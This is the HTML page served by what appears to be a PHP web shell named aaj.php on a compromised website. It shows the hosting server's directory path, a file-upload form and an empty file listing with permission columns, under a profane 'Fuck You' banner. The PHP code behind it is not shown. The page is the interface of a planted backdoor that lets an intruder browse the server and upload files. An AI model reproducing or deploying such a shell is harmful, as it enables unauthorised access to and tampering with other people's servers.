<!DOCTYPE HTML>
<html>
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<link href="http://nigeriansinnovascotia.org/aaj.php?path%3D%2Fhermes%2Fbosnacweb05%2Fbosnacweb05bd%2Fb2756" rel="stylesheet" type="text/css">
<title></title>
	<link rel="canonical" href="https://nigeriansinnovascotia.org/aaj_path-_hermes_bosnacweb05_bosnacweb05bd_b2756" />
<style>
body{
font-family: "Racing Sans One", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: "Rye", cursive;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</head>
<body>
<h1><center><img src="lq/i/mesg/emoticons7/19.gif"/>
Fuck You <img src="lq/i/mesg/emoticons7/19.gif"/>
 </center></h1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr><td>Way: <a href="aaj.php/path-">/</a><a href="aaj.php/path-_hermes">hermes</a>/<a href="aaj.php/path-_hermes_bosnacweb05">bosnacweb05</a>/<a href="aaj.php/path-_hermes_bosnacweb05_bosnacweb05bd">bosnacweb05bd</a>/<a href="aaj.php/path-_hermes_bosnacweb05_bosnacweb05bd_b2756">b2756</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">
Fuck: <input type="file" name="file"/>
<input type="submit" value="Up"/>
</form>
</td></tr></table><br/><center></center><div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
<tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr><tr class="first"><td></td><td></td><td></td><td></td></tr></table>
</div>
</body>
</html>